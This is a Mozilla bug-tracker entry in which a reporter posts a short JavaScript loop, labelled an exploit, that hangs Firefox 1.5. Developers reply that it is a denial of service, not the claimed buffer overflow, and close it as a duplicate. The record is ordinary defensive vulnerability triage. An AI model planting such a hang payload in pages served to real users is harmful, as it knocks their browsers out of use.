Closed
Bug 330893
Opened 19 years ago
Closed 19 years ago
Firefox Bug in Javascript and Buffer Overflow
Categories
(Core :: JavaScript Engine, defect)
RESOLVED
DUPLICATE
of bug 112858
People
(Reporter: guelfoweb, Unassigned)
Details
(Keywords: hang, Whiteboard: [sg:dos])
Attachments
(1 file)
193 bytes,
text/html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
If you run code without security extension (noscript, etc.) on Windows XP SP2, it generates a buffer overflow. In order to finish the process you must kill the application from the task bar.
Code Javascript Exploit:
--------------------------------------------------
<script language="JavaScript1.2" type="text/javascript">
function exploit() {}
for (k=0;k<k+1;k++){document.write('<a href="javascript:exploit()");"><img src=""/</a></a>'); }
</script>
--------------------------------------------------
Reproducible: Always
Comment 1•19 years ago
I don't see a buffer overflow on trunk or 1.5.0.2, just a DOS like bug 320760 and transitively bug 317334. The test continually uses memory so there may be an out of memory or gc related crash someday.
Comment 2•19 years ago
I also don't see any kind of buffer overflow here. It is annoying that the runaway-script detection is foiled by this, though -- it's a pretty effective DoS.
Clearing the security flag, pointless since this is from a public blog.
Updated•19 years ago
Component: JavaScript Console → JavaScript Engine
Product: Firefox → Core
Version: unspecified → Trunk
Comment 3•19 years ago
better dupe candidate: 112858
*** This bug has been marked as a duplicate of 112858 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE